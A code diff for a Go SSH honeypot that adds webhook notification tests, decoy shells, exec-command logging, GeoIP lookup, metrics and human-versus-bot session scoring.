t.Errorf("failed to decode payload: %v", err)
|
||||||
|
}
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
close(done)
|
||||||
|
}))
|
||||||
|
defer srv.Close()
|
||||||
|
|
||||||
|
webhooks := []config.WebhookNotifyConfig{
|
||||||
|
{URL: srv.URL},
|
||||||
|
}
|
||||||
|
|
||||||
|
n := NewNotifier(webhooks, slog.Default())
|
||||||
|
session := testSession()
|
||||||
|
n.Notify(context.Background(), EventHumanDetected, session)
|
||||||
|
|
||||||
|
select {
|
||||||
|
case <-done:
|
||||||
|
case <-time.After(2 * time.Second):
|
||||||
|
t.Fatal("timeout waiting for webhook")
|
||||||
|
}
|
||||||
|
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
if received.Event != EventHumanDetected {
|
||||||
|
t.Errorf("event: got %q, want %q", received.Event, EventHumanDetected)
|
||||||
|
}
|
||||||
|
if received.Session.ID != session.ID {
|
||||||
|
t.Errorf("session ID: got %q, want %q", received.Session.ID, session.ID)
|
||||||
|
}
|
||||||
|
if received.Session.IP != session.IP {
|
||||||
|
t.Errorf("session IP: got %q, want %q", received.Session.IP, session.IP)
|
||||||
|
}
|
||||||
|
if received.Session.HumanScore != session.HumanScore {
|
||||||
|
t.Errorf("score: got %f, want %f", received.Session.HumanScore, session.HumanScore)
|
||||||
|
}
|
||||||
|
if received.Timestamp == "" {
|
||||||
|
t.Error("timestamp should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNotifier_CustomHeaders(t *testing.T) {
|
||||||
|
var receivedHeaders http.Header
|
||||||
|
done := make(chan struct{})
|
||||||
|
|
||||||
|
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
receivedHeaders = r.Header.Clone()
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
close(done)
|
||||||
|
}))
|
||||||
|
defer srv.Close()
|
||||||
|
|
||||||
|
webhooks := []config.WebhookNotifyConfig{
|
||||||
|
{
|
||||||
|
URL: srv.URL,
|
||||||
|
Headers: map[string]string{
|
||||||
|
"Authorization": "Bearer test-token",
|
||||||
|
"X-Custom": "my-value",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
n := NewNotifier(webhooks, slog.Default())
|
||||||
|
n.Notify(context.Background(), EventSessionStarted, testSession())
|
||||||
|
|
||||||
|
select {
|
||||||
|
case <-done:
|
||||||
|
case <-time.After(2 * time.Second):
|
||||||
|
t.Fatal("timeout waiting for webhook")
|
||||||
|
}
|
||||||
|
|
||||||
|
if got := receivedHeaders.Get("Authorization"); got != "Bearer test-token" {
|
||||||
|
t.Errorf("Authorization header: got %q, want %q", got, "Bearer test-token")
|
||||||
|
}
|
||||||
|
if got := receivedHeaders.Get("X-Custom"); got != "my-value" {
|
||||||
|
t.Errorf("X-Custom header: got %q, want %q", got, "my-value")
|
||||||
|
}
|
||||||
|
if got := receivedHeaders.Get("Content-Type"); got != "application/json" {
|
||||||
|
t.Errorf("Content-Type: got %q, want %q", got, "application/json")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNotifier_Deduplication(t *testing.T) {
|
||||||
|
var count int
|
||||||
|
var mu sync.Mutex
|
||||||
|
|
||||||
|
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
mu.Lock()
|
||||||
|
count++
|
||||||
|
mu.Unlock()
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
}))
|
||||||
|
defer srv.Close()
|
||||||
|
|
||||||
|
webhooks := []config.WebhookNotifyConfig{{URL: srv.URL}}
|
||||||
|
n := NewNotifier(webhooks, slog.Default())
|
||||||
|
session := testSession()
|
||||||
|
|
||||||
|
// Send same event three times for the same session.
|
||||||
|
for range 3 {
|
||||||
|
n.Notify(context.Background(), EventHumanDetected, session)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Allow goroutines to complete.
|
||||||
|
time.Sleep(500 * time.Millisecond)
|
||||||
|
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
if count != 1 {
|
||||||
|
t.Errorf("dedup: got %d sends, want 1", count)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNotifier_EventFiltering(t *testing.T) {
|
||||||
|
var receivedEvents []string
|
||||||
|
var mu sync.Mutex
|
||||||
|
|
||||||
|
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
var payload webhookPayload
|
||||||
|
_ = json.NewDecoder(r.Body).Decode(&payload)
|
||||||
|
mu.Lock()
|
||||||
|
receivedEvents = append(receivedEvents, payload.Event)
|
||||||
|
mu.Unlock()
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
}))
|
||||||
|
defer srv.Close()
|
||||||
|
|
||||||
|
// Only subscribe to human_detected.
|
||||||
|
webhooks := []config.WebhookNotifyConfig{
|
||||||
|
{
|
||||||
|
URL: srv.URL,
|
||||||
|
Events: []string{EventHumanDetected},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
n := NewNotifier(webhooks, slog.Default())
|
||||||
|
session := testSession()
|
||||||
|
|
||||||
|
// Send both event types.
|
||||||
|
n.Notify(context.Background(), EventSessionStarted, session)
|
||||||
|
// Need a different session for human_detected to avoid dedup with same session.
|
||||||
|
session2 := testSession()
|
||||||
|
session2.ID = "test-session-456"
|
||||||
|
n.Notify(context.Background(), EventHumanDetected, session2)
|
||||||
|
|
||||||
|
time.Sleep(500 * time.Millisecond)
|
||||||
|
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
if len(receivedEvents) != 1 {
|
||||||
|
t.Fatalf("event filtering: got %d events, want 1", len(receivedEvents))
|
||||||
|
}
|
||||||
|
if receivedEvents[0] != EventHumanDetected {
|
||||||
|
t.Errorf("filtered event: got %q, want %q", receivedEvents[0], EventHumanDetected)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNotifier_CleanupSession(t *testing.T) {
|
||||||
|
var count int
|
||||||
|
var mu sync.Mutex
|
||||||
|
|
||||||
|
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
mu.Lock()
|
||||||
|
count++
|
||||||
|
mu.Unlock()
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
}))
|
||||||
|
defer srv.Close()
|
||||||
|
|
||||||
|
webhooks := []config.WebhookNotifyConfig{{URL: srv.URL}}
|
||||||
|
n := NewNotifier(webhooks, slog.Default())
|
||||||
|
session := testSession()
|
||||||
|
|
||||||
|
n.Notify(context.Background(), EventHumanDetected, session)
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
|
||||||
|
// Cleanup and resend — should work again.
|
||||||
|
n.CleanupSession(session.ID)
|
||||||
|
n.Notify(context.Background(), EventHumanDetected, session)
|
||||||
|
time.Sleep(200 * time.Millisecond)
|
||||||
|
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
if count != 2 {
|
||||||
|
t.Errorf("after cleanup: got %d sends, want 2", count)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNoopNotifier(t *testing.T) {
|
||||||
|
// Should not panic.
|
||||||
|
n := NoopNotifier{}
|
||||||
|
n.Notify(context.Background(), EventHumanDetected, testSession())
|
||||||
|
n.CleanupSession("test")
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNewSender_NoWebhooks(t *testing.T) {
|
||||||
|
sender := NewSender(nil, slog.Default())
|
||||||
|
if _, ok := sender.(NoopNotifier); !ok {
|
||||||
|
t.Errorf("expected NoopNotifier, got %T", sender)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNewSender_WithWebhooks(t *testing.T) {
|
||||||
|
webhooks := []config.WebhookNotifyConfig{{URL: "http://example.com"}}
|
||||||
|
sender := NewSender(webhooks, slog.Default())
|
||||||
|
if _, ok := sender.(*Notifier); !ok {
|
||||||
|
t.Errorf("expected *Notifier, got %T", sender)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -12,14 +12,25 @@ import (
|
|||||||
"os"
|
"os"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"git.t-juice.club/torjus/oubliette/internal/auth"
|
"code.t-juice.club/torjus/oubliette/internal/auth"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
"code.t-juice.club/torjus/oubliette/internal/detection"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/geoip"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/metrics"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/notify"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/adventure"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/banking"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/bash"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/cisco"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/fridge"
|
||||||
|
psqlshell "code.t-juice.club/torjus/oubliette/internal/shell/psql"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/roomba"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell/tetris"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
"golang.org/x/crypto/ssh"
|
"golang.org/x/crypto/ssh"
|
||||||
)
|
)
|
||||||
|
|
||||||
const sessionTimeout = 30 * time.Second
|
|
||||||
|
|
||||||
type Server struct {
|
type Server struct {
|
||||||
cfg config.Config
|
cfg config.Config
|
||||||
store storage.Store
|
store storage.Store
|
||||||
@@ -27,15 +38,54 @@ type Server struct {
|
|||||||
sshConfig *ssh.ServerConfig
|
sshConfig *ssh.ServerConfig
|
||||||
logger *slog.Logger
|
logger *slog.Logger
|
||||||
connSem chan struct{} // semaphore limiting concurrent connections
|
connSem chan struct{} // semaphore limiting concurrent connections
|
||||||
|
shellRegistry *shell.Registry
|
||||||
|
notifier notify.Sender
|
||||||
|
metrics *metrics.Metrics
|
||||||
|
geoip *geoip.Reader
|
||||||
|
}
|
||||||
|
|
||||||
|
func New(cfg config.Config, store storage.Store, logger *slog.Logger, m *metrics.Metrics) (*Server, error) {
|
||||||
|
registry := shell.NewRegistry()
|
||||||
|
if err := registry.Register(bash.NewBashShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering bash shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(fridge.NewFridgeShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering fridge shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(banking.NewBankingShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering banking shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(adventure.NewAdventureShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering adventure shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(cisco.NewCiscoShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering cisco shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(psqlshell.NewPsqlShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering psql shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(roomba.NewRoombaShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering roomba shell: %w", err)
|
||||||
|
}
|
||||||
|
if err := registry.Register(tetris.NewTetrisShell(), 1); err != nil {
|
||||||
|
return nil, fmt.Errorf("registering tetris shell: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
geo, err := geoip.New()
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("opening geoip database: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) {
|
|
||||||
s := &Server{
|
s := &Server{
|
||||||
cfg: cfg,
|
cfg: cfg,
|
||||||
store: store,
|
store: store,
|
||||||
authenticator: auth.NewAuthenticator(cfg.Auth),
|
authenticator: auth.NewAuthenticator(cfg.Auth),
|
||||||
logger: logger,
|
logger: logger,
|
||||||
connSem: make(chan struct{}, cfg.SSH.MaxConnections),
|
connSem: make(chan struct{}, cfg.SSH.MaxConnections),
|
||||||
|
shellRegistry: registry,
|
||||||
|
notifier: notify.NewSender(cfg.Notify.Webhooks, logger),
|
||||||
|
metrics: m,
|
||||||
|
geoip: geo,
|
||||||
}
|
}
|
||||||
|
|
||||||
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
|
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
|
||||||
@@ -53,6 +103,8 @@ func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server,
|
|||||||
}
|
}
|
||||||
|
|
||||||
func (s *Server) ListenAndServe(ctx context.Context) error {
|
func (s *Server) ListenAndServe(ctx context.Context) error {
|
||||||
|
defer s.geoip.Close()
|
||||||
|
|
||||||
listener, err := net.Listen("tcp", s.cfg.SSH.ListenAddr)
|
listener, err := net.Listen("tcp", s.cfg.SSH.ListenAddr)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return fmt.Errorf("listen: %w", err)
|
return fmt.Errorf("listen: %w", err)
|
||||||
@@ -79,11 +131,16 @@ func (s *Server) ListenAndServe(ctx context.Context) error {
|
|||||||
// Enforce max concurrent connections.
|
// Enforce max concurrent connections.
|
||||||
select {
|
select {
|
||||||
case s.connSem <- struct{}{}:
|
case s.connSem <- struct{}{}:
|
||||||
|
s.metrics.SSHConnectionsActive.Inc()
|
||||||
go func() {
|
go func() {
|
||||||
defer func() { <-s.connSem }()
|
defer func() {
|
||||||
|
<-s.connSem
|
||||||
|
s.metrics.SSHConnectionsActive.Dec()
|
||||||
|
}()
|
||||||
s.handleConn(conn)
|
s.handleConn(conn)
|
||||||
}()
|
}()
|
||||||
default:
|
default:
|
||||||
|
s.metrics.SSHConnectionsTotal.WithLabelValues("rejected_max_connections").Inc()
|
||||||
s.logger.Warn("max connections reached, rejecting", "remote_addr", conn.RemoteAddr())
|
s.logger.Warn("max connections reached, rejecting", "remote_addr", conn.RemoteAddr())
|
||||||
conn.Close()
|
conn.Close()
|
||||||
}
|
}
|
||||||
@@ -95,11 +152,13 @@ func (s *Server) handleConn(conn net.Conn) {
|
|||||||
|
|
||||||
sshConn, chans, reqs, err := ssh.NewServerConn(conn, s.sshConfig)
|
sshConn, chans, reqs, err := ssh.NewServerConn(conn, s.sshConfig)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
|
s.metrics.SSHConnectionsTotal.WithLabelValues("rejected_handshake").Inc()
|
||||||
s.logger.Debug("SSH handshake failed", "remote_addr", conn.RemoteAddr(), "err", err)
|
s.logger.Debug("SSH handshake failed", "remote_addr", conn.RemoteAddr(), "err", err)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
defer sshConn.Close()
|
defer sshConn.Close()
|
||||||
|
|
||||||
|
s.metrics.SSHConnectionsTotal.WithLabelValues("accepted").Inc()
|
||||||
s.logger.Info("SSH connection established",
|
s.logger.Info("SSH connection established",
|
||||||
"remote_addr", sshConn.RemoteAddr(),
|
"remote_addr", sshConn.RemoteAddr(),
|
||||||
"user", sshConn.User(),
|
"user", sshConn.User(),
|
||||||
@@ -126,26 +185,94 @@ func (s *Server) handleConn(conn net.Conn) {
|
|||||||
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
|
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
|
||||||
defer channel.Close()
|
defer channel.Close()
|
||||||
|
|
||||||
|
// Select a shell from the registry.
|
||||||
|
// If the auth layer specified a shell preference, use it; otherwise random.
|
||||||
|
var selectedShell shell.Shell
|
||||||
|
if conn.Permissions != nil && conn.Permissions.Extensions["shell"] != "" {
|
||||||
|
shellName := conn.Permissions.Extensions["shell"]
|
||||||
|
sh, ok := s.shellRegistry.Get(shellName)
|
||||||
|
if ok {
|
||||||
|
selectedShell = sh
|
||||||
|
} else {
|
||||||
|
s.logger.Warn("configured shell not found, falling back to random", "shell", shellName)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Second priority: username-based route.
|
||||||
|
if selectedShell == nil {
|
||||||
|
if shellName, ok := s.cfg.Shell.UsernameRoutes[conn.User()]; ok {
|
||||||
|
sh, found := s.shellRegistry.Get(shellName)
|
||||||
|
if found {
|
||||||
|
selectedShell = sh
|
||||||
|
} else {
|
||||||
|
s.logger.Warn("username route shell not found, falling back to random", "shell", shellName, "user", conn.User())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Lowest priority: random selection.
|
||||||
|
if selectedShell == nil {
|
||||||
|
var err error
|
||||||
|
selectedShell, err = s.shellRegistry.Select()
|
||||||
|
if err != nil {
|
||||||
|
s.logger.Error("failed to select shell", "err", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
ip := extractIP(conn.RemoteAddr())
|
ip := extractIP(conn.RemoteAddr())
|
||||||
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), "")
|
country := s.geoip.Lookup(ip)
|
||||||
|
sessionStart := time.Now()
|
||||||
|
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), selectedShell.Name(), country)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
s.logger.Error("failed to create session", "err", err)
|
s.logger.Error("failed to create session", "err", err)
|
||||||
} else {
|
} else {
|
||||||
|
s.metrics.SessionsTotal.WithLabelValues(selectedShell.Name()).Inc()
|
||||||
|
s.metrics.SessionsActive.Inc()
|
||||||
defer func() {
|
defer func() {
|
||||||
|
s.metrics.SessionsActive.Dec()
|
||||||
|
s.metrics.SessionDuration.Observe(time.Since(sessionStart).Seconds())
|
||||||
if err := s.store.EndSession(context.Background(), sessionID, time.Now()); err != nil {
|
if err := s.store.EndSession(context.Background(), sessionID, time.Now()); err != nil {
|
||||||
s.logger.Error("failed to end session", "err", err)
|
s.logger.Error("failed to end session", "err", err)
|
||||||
}
|
}
|
||||||
}()
|
}()
|
||||||
}
|
}
|
||||||
|
|
||||||
// Handle session requests (pty-req, shell, etc.)
|
s.logger.Info("session started",
|
||||||
|
"remote_addr", conn.RemoteAddr(),
|
||||||
|
"user", conn.User(),
|
||||||
|
"shell", selectedShell.Name(),
|
||||||
|
"session_id", sessionID,
|
||||||
|
)
|
||||||
|
|
||||||
|
// Send session_started notification.
|
||||||
|
connectedAt := time.Now()
|
||||||
|
sessionInfo := notify.SessionInfo{
|
||||||
|
ID: sessionID,
|
||||||
|
IP: ip,
|
||||||
|
Username: conn.User(),
|
||||||
|
ShellName: selectedShell.Name(),
|
||||||
|
ConnectedAt: notify.FormatConnectedAt(connectedAt),
|
||||||
|
}
|
||||||
|
s.notifier.Notify(context.Background(), notify.EventSessionStarted, sessionInfo)
|
||||||
|
defer s.notifier.CleanupSession(sessionID)
|
||||||
|
|
||||||
|
// Handle session requests (pty-req, shell, exec, etc.)
|
||||||
|
execCh := make(chan string, 1)
|
||||||
go func() {
|
go func() {
|
||||||
|
defer close(execCh)
|
||||||
for req := range requests {
|
for req := range requests {
|
||||||
switch req.Type {
|
switch req.Type {
|
||||||
case "pty-req", "shell":
|
case "pty-req", "shell":
|
||||||
if req.WantReply {
|
if req.WantReply {
|
||||||
req.Reply(true, nil)
|
req.Reply(true, nil)
|
||||||
}
|
}
|
||||||
|
case "exec":
|
||||||
|
if req.WantReply {
|
||||||
|
req.Reply(true, nil)
|
||||||
|
}
|
||||||
|
var payload struct{ Command string }
|
||||||
|
if err := ssh.Unmarshal(req.Payload, &payload); err == nil {
|
||||||
|
execCh <- payload.Command
|
||||||
|
}
|
||||||
default:
|
default:
|
||||||
if req.WantReply {
|
if req.WantReply {
|
||||||
req.Reply(false, nil)
|
req.Reply(false, nil)
|
||||||
@@ -154,32 +281,127 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
|
|||||||
}
|
}
|
||||||
}()
|
}()
|
||||||
|
|
||||||
// Write a fake banner.
|
// Check for exec request before proceeding to interactive shell.
|
||||||
fmt.Fprint(channel, "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n")
|
select {
|
||||||
fmt.Fprintf(channel, "Last login: %s from 10.0.0.1\r\n", time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
|
case cmd, ok := <-execCh:
|
||||||
fmt.Fprintf(channel, "%s@ubuntu:~$ ", conn.User())
|
if ok && cmd != "" {
|
||||||
|
s.logger.Info("exec command received",
|
||||||
// Hold connection open until timeout or client disconnect.
|
"remote_addr", conn.RemoteAddr(),
|
||||||
timer := time.NewTimer(sessionTimeout)
|
"user", conn.User(),
|
||||||
defer timer.Stop()
|
"session_id", sessionID,
|
||||||
|
"command", cmd,
|
||||||
done := make(chan struct{})
|
)
|
||||||
go func() {
|
if err := s.store.SetExecCommand(context.Background(), sessionID, cmd); err != nil {
|
||||||
buf := make([]byte, 256)
|
s.logger.Error("failed to set exec command", "err", err, "session_id", sessionID)
|
||||||
for {
|
}
|
||||||
_, err := channel.Read(buf)
|
s.metrics.ExecCommandsTotal.Inc()
|
||||||
if err != nil {
|
// Send exit-status 0 and close channel.
|
||||||
close(done)
|
exitPayload := make([]byte, 4) // uint32(0)
|
||||||
|
_, _ = channel.SendRequest("exit-status", false, exitPayload)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
case <-time.After(500 * time.Millisecond):
|
||||||
|
// No exec request within timeout — proceed with interactive shell.
|
||||||
}
|
}
|
||||||
}()
|
|
||||||
|
|
||||||
|
// Build session context.
|
||||||
|
var shellCfg map[string]any
|
||||||
|
if s.cfg.Shell.Shells != nil {
|
||||||
|
shellCfg = s.cfg.Shell.Shells[selectedShell.Name()]
|
||||||
|
}
|
||||||
|
sessCtx := &shell.SessionContext{
|
||||||
|
SessionID: sessionID,
|
||||||
|
Username: conn.User(),
|
||||||
|
RemoteAddr: ip,
|
||||||
|
ClientVersion: string(conn.ClientVersion()),
|
||||||
|
Store: s.store,
|
||||||
|
ShellConfig: shellCfg,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: s.cfg.Shell.Hostname,
|
||||||
|
Banner: s.cfg.Shell.Banner,
|
||||||
|
FakeUser: s.cfg.Shell.FakeUser,
|
||||||
|
},
|
||||||
|
OnCommand: func(sh string) {
|
||||||
|
s.metrics.CommandsExecuted.WithLabelValues(sh).Inc()
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wrap channel in RecordingChannel.
|
||||||
|
recorder := shell.NewRecordingChannel(channel)
|
||||||
|
|
||||||
|
// Always record session events for replay.
|
||||||
|
eventRec := shell.NewEventRecorder(sessionID, s.store, s.logger)
|
||||||
|
eventRec.Start(context.Background())
|
||||||
|
defer eventRec.Close()
|
||||||
|
recorder.AddCallback(eventRec.RecordEvent)
|
||||||
|
|
||||||
|
// Set up detection scorer if enabled.
|
||||||
|
var scorer *detection.Scorer
|
||||||
|
var scoreCancel context.CancelFunc
|
||||||
|
if s.cfg.Detection.Enabled {
|
||||||
|
scorer = detection.NewScorer()
|
||||||
|
recorder.AddCallback(func(ts time.Time, direction int, data []byte) {
|
||||||
|
scorer.RecordEvent(ts, direction, data)
|
||||||
|
})
|
||||||
|
|
||||||
|
var scoreCtx context.Context
|
||||||
|
scoreCtx, scoreCancel = context.WithCancel(context.Background())
|
||||||
|
go s.runScoreUpdater(scoreCtx, sessionID, scorer, sessionInfo)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := selectedShell.Handle(context.Background(), sessCtx, recorder); err != nil {
|
||||||
|
s.logger.Error("shell error", "err", err, "session_id", sessionID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Stop score updater and write final score.
|
||||||
|
if scoreCancel != nil {
|
||||||
|
scoreCancel()
|
||||||
|
}
|
||||||
|
if scorer != nil {
|
||||||
|
finalScore := scorer.Score()
|
||||||
|
s.metrics.HumanScore.Observe(finalScore)
|
||||||
|
if err := s.store.UpdateHumanScore(context.Background(), sessionID, finalScore); err != nil {
|
||||||
|
s.logger.Error("failed to write final human score", "err", err, "session_id", sessionID)
|
||||||
|
}
|
||||||
|
s.logger.Info("session ended",
|
||||||
|
"remote_addr", conn.RemoteAddr(),
|
||||||
|
"user", conn.User(),
|
||||||
|
"session_id", sessionID,
|
||||||
|
"human_score", finalScore,
|
||||||
|
)
|
||||||
|
} else {
|
||||||
|
s.logger.Info("session ended",
|
||||||
|
"remote_addr", conn.RemoteAddr(),
|
||||||
|
"user", conn.User(),
|
||||||
|
"session_id", sessionID,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// runScoreUpdater periodically computes the human score, writes it to the DB,
|
||||||
|
// and triggers a notification if the threshold is crossed.
|
||||||
|
func (s *Server) runScoreUpdater(ctx context.Context, sessionID string, scorer *detection.Scorer, sessionInfo notify.SessionInfo) {
|
||||||
|
ticker := time.NewTicker(s.cfg.Detection.UpdateIntervalDuration)
|
||||||
|
defer ticker.Stop()
|
||||||
|
|
||||||
|
for {
|
||||||
select {
|
select {
|
||||||
case <-timer.C:
|
case <-ctx.Done():
|
||||||
s.logger.Info("session timed out", "remote_addr", conn.RemoteAddr(), "user", conn.User())
|
return
|
||||||
case <-done:
|
case <-ticker.C:
|
||||||
s.logger.Info("session closed by client", "remote_addr", conn.RemoteAddr(), "user", conn.User())
|
score := scorer.Score()
|
||||||
|
if err := s.store.UpdateHumanScore(ctx, sessionID, score); err != nil {
|
||||||
|
s.logger.Error("failed to update human score", "err", err, "session_id", sessionID)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
s.logger.Debug("human score updated", "session_id", sessionID, "score", score)
|
||||||
|
|
||||||
|
if score >= s.cfg.Detection.Threshold {
|
||||||
|
info := sessionInfo
|
||||||
|
info.HumanScore = score
|
||||||
|
s.notifier.Notify(ctx, notify.EventHumanDetected, info)
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -187,6 +409,12 @@ func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.
|
|||||||
ip := extractIP(conn.RemoteAddr())
|
ip := extractIP(conn.RemoteAddr())
|
||||||
d := s.authenticator.Authenticate(ip, conn.User(), string(password))
|
d := s.authenticator.Authenticate(ip, conn.User(), string(password))
|
||||||
|
|
||||||
|
if d.Accepted {
|
||||||
|
s.metrics.AuthAttemptsTotal.WithLabelValues("accepted", d.Reason).Inc()
|
||||||
|
} else {
|
||||||
|
s.metrics.AuthAttemptsTotal.WithLabelValues("rejected", d.Reason).Inc()
|
||||||
|
}
|
||||||
|
|
||||||
s.logger.Info("auth attempt",
|
s.logger.Info("auth attempt",
|
||||||
"remote_addr", conn.RemoteAddr(),
|
"remote_addr", conn.RemoteAddr(),
|
||||||
"username", conn.User(),
|
"username", conn.User(),
|
||||||
@@ -194,12 +422,22 @@ func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.
|
|||||||
"reason", d.Reason,
|
"reason", d.Reason,
|
||||||
)
|
)
|
||||||
|
|
||||||
if err := s.store.RecordLoginAttempt(context.Background(), conn.User(), string(password), ip); err != nil {
|
country := s.geoip.Lookup(ip)
|
||||||
|
if country != "" {
|
||||||
|
s.metrics.AuthAttemptsByCountry.WithLabelValues(country).Inc()
|
||||||
|
}
|
||||||
|
if err := s.store.RecordLoginAttempt(context.Background(), conn.User(), string(password), ip, country); err != nil {
|
||||||
s.logger.Error("failed to record login attempt", "err", err)
|
s.logger.Error("failed to record login attempt", "err", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if d.Accepted {
|
if d.Accepted {
|
||||||
return nil, nil
|
var perms *ssh.Permissions
|
||||||
|
if d.Shell != "" {
|
||||||
|
perms = &ssh.Permissions{
|
||||||
|
Extensions: map[string]string{"shell": d.Shell},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return perms, nil
|
||||||
}
|
}
|
||||||
return nil, fmt.Errorf("rejected")
|
return nil, fmt.Errorf("rejected")
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,16 +1,20 @@
|
|||||||
package server
|
package server
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"bytes"
|
||||||
"context"
|
"context"
|
||||||
"log/slog"
|
"log/slog"
|
||||||
"net"
|
"net"
|
||||||
"os"
|
"os"
|
||||||
"path/filepath"
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
"testing"
|
"testing"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
"code.t-juice.club/torjus/oubliette/internal/auth"
|
||||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/metrics"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
"golang.org/x/crypto/ssh"
|
"golang.org/x/crypto/ssh"
|
||||||
)
|
)
|
||||||
|
|
||||||
@@ -106,15 +110,19 @@ func TestIntegrationSSHConnect(t *testing.T) {
